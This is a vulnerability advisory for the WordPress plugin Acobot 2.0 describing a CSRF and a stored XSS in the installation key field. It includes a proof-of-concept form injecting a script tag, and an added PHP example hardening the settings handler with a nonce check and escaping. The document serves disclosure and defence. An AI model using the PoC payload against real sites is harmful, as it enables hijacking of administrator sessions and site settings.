Title: WordPress 'Acobot Live Chat & Contact Form' CSRF/XSS
Version: 2.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/acobot/
Contacted WordPress: 2015/01/26
==========================================================

## Plugin description:
==========================================================
Enhance your WordPress with a virtual robot in 3 minutes or less and boost your sales like never before. It's simple, easy and fast.

## CSRF:
==========================================================
It is possible to change the plugin's settings by tricking a logged-in admin into visiting a crafted page that submits the settings form on their behalf.


## Stored XSS:
==========================================================
The installation key entered in the admin panel is stored and later displayed without sanitization or output escaping. An attacker who can set that field can therefore inject script that executes whenever the settings page is rendered (stored XSS).

PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=acobot&update_account=something">
    <input type="text" name="acobot_token" value="&quot;/><script>alert(1)</script>"><br />
    <input type="hidden" name="acobot_code_script" value=""><br />
    <input type="submit">
</form>
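The following is an added example, not the Acobot plugin's code, showing how a WordPress settings handler for the acobot_token field could be hardened against both issues described above: a nonce check against the CSRF, and input sanitization plus output escaping against the stored XSS. The example_ function and nonce names, the acobot_token option name, and the alphanumeric key format are assumptions; the WordPress API calls are real.

```php
<?php
// Added example, not the plugin's code: hardened settings form and handler
// for the acobot_token / acobot_code_script fields named in the PoC.
// Names prefixed example_ and the key format are hypothetical.

// Render the settings form: emit a nonce and escape the stored token on output.
function example_acobot_settings_form() {
    $token = get_option( 'acobot_token', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=acobot&update_account=1' ) ); ?>">
        <?php wp_nonce_field( 'example_acobot_update', 'example_acobot_nonce' ); ?>
        <!-- esc_attr() keeps a stored "/><script>... from breaking out of the attribute -->
        <input type="text" name="acobot_token" value="<?php echo esc_attr( $token ); ?>">
        <input type="hidden" name="acobot_code_script" value="">
        <?php submit_button(); ?>
    </form>
    <?php
}

// Handle the POST: capability check, nonce check (defeats the CSRF), then sanitize.
function example_acobot_handle_update() {
    if ( ! isset( $_GET['update_account'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // check_admin_referer() dies unless a valid nonce for this action is present,
    // so a form submitted from a third-party page is rejected.
    check_admin_referer( 'example_acobot_update', 'example_acobot_nonce' );

    $raw = isset( $_POST['acobot_token'] ) ? wp_unslash( $_POST['acobot_token'] ) : '';
    // sanitize_text_field() strips tags and stray angle brackets before storage.
    $token = sanitize_text_field( $raw );
    // Assumption: a valid installation key is alphanumeric; reject anything else.
    if ( ! preg_match( '/^[A-Za-z0-9]{1,64}$/', $token ) ) {
        add_settings_error( 'acobot_token', 'invalid', 'Invalid installation key.' );
        return;
    }
    update_option( 'acobot_token', $token );
}
add_action( 'admin_init', 'example_acobot_handle_update' );
```

With this handler the PoC form above fails the nonce check before any value is stored, and a key containing quotes or angle brackets is rejected rather than saved.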


## Solution:
==========================================================
No fix has been released.